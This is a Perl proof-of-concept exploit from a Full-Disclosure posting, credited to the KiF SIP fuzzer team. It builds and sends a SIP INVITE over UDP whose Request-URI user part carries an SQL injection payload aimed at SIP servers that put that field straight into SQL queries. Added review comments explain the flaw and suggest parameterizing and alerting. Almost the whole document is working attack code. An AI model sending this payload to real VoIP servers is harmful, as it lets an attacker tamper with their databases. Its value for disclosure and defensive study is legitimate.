for testing purposes the POC of the vulnerabiliy discovered by the KIPH fuzzer RS
#!/usr/bin/perl
#############################################
# Vulnerabily discovered using KiF ~ Kiph   #
#                                           #
# Authors:                                  #
# Humberto J. Abdelnur (Ph.D Student)       #
# Radu State (Ph.D)                         #
# Olivier Festor (Ph.D)                     #
#                                           #
# Madynes Team, LORIA - INRIA Lorraine      #
# http://madynes.loria.fr                   #
#############################################
#
# Proof-of-concept as posted to Full-Disclosure: sends one SIP INVITE over
# UDP whose Request-URI user part is an SQL string-injection payload.  The
# vulnerable pattern on the receiving side is a SIP server that interpolates
# the Request-URI user part into an SQL statement instead of binding it as a
# parameter.  Defensive takeaways: parameterize (or strictly validate) that
# value, and alert on INVITE Request-URIs whose user part contains a quote
# character or an SQL comment opener.
#
# NOTE(review): no `use strict`/`use warnings`, so every variable below is a
# package global.  Several header values (From/To/Contact) and the usage
# string are empty in this copy -- presumably lost when the post was
# archived; confirm against the original.

use IO::Socket::INET;
use String::Random;

$foo = new String::Random;    # indirect-object call; String::Random->new is the preferred form

# Six positional arguments are expected; only the presence of the sixth is checked.
die "Usage $0 " unless ($ARGV[5]);

# Hex-encode a string one character at a time: each ordinal is formatted
# with sprintf '%lx' and appended.  Returns the concatenated hex string
# (implicit return of the last expression).  The trailing-space strip is a
# no-op here, since no separator is ever appended between characters.
sub iso2hex($) {    # the ($) prototype forces scalar context on the argument
    my $hex = '';
    for (my $i = 0; $i < length($_[0]); $i++) {
        my $ordno = ord substr($_[0], $i, 1);
        $hex .= sprintf("%lx", $ordno);
    }
    $hex =~ s/ $//;;
    $hex;
}

# Positional arguments: called user, target host and port, then the
# sending side's user, host and local port.
$callUser = $ARGV[0];
$targetIP = $ARGV[1];
$targetPort = $ARGV[2];
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[4];
$attackerPort= $ARGV[5];

# UDP socket towards the target, bound locally to $attackerPort.
# NOTE(review): mixes indirect-object `new` with an arrow `->new` call, and
# the result is never checked; a socket failure would only surface at the
# send() call at the bottom.
$socket=new IO::Socket::INET->new(
    Proto=>'udp',
    PeerPort=>$targetPort,
    PeerAddr=>$targetIP,
    LocalPort=>$attackerPort);

# Hex-encoded secondary string, embedded in the payload as a 0x literal
# (empty in this copy).
$scriptinjection= iso2hex("");
# Injection payload placed in the Request-URI user part: it closes the
# quoted string, supplies extra column values, and comments out the
# remainder of the statement.
$sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*";

# Random Call-ID and CSeq values.
$callid= $foo->randpattern("CCccnCn");
$cseq = $foo->randregex('\d\d\d\d');

# SDP offer (a single audio m-line with several codecs); its byte length is
# used for Content-Length below.
$sdp = "v=0\r o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r s=-\r c=IN IP4 $attackerIP\r t=0 0\r m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r a=sendrecv\r a=ptime:20\r a=maxptime:200\r a=fmtp:96 mode-change-neighbor=1\r a=fmtp:18 annexb=no\r a=fmtp:98 0-15\r a=rtpmap:96 AMR/8000/1\r a=rtpmap:0 PCMU/8000/1\r a=rtpmap:8 PCMA/8000/1\r a=rtpmap:97 iLBC/8000/1\r a=rtpmap:18 G729/8000/1\r a=rtpmap:98 telephone-event/8000/1\r a=rtpmap:13 CN/8000/1\r ";
$sdplen= length $sdp;

# The INVITE request; the injection payload is the user part of the
# Request-URI.  From/To/Contact values are empty in this copy (see the
# review note at the top).
$msg = "INVITE sip:$sqlinjection\@$targetIP SIP/2.0\r Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r From: ;tag=1\r To: \r Call-ID: $callid\@$attackerIP\r CSeq: $cseq INVITE\r Max-Forwards: 70\r Contact: \r Content-Type: application/sdp\r Content-Length: $sdplen\r \r $sdp";

# Fire-and-forget: the datagram is sent and no response is read.
$socket->send($msg);
_______________________________________________ Full-Disclosure - We believe in it.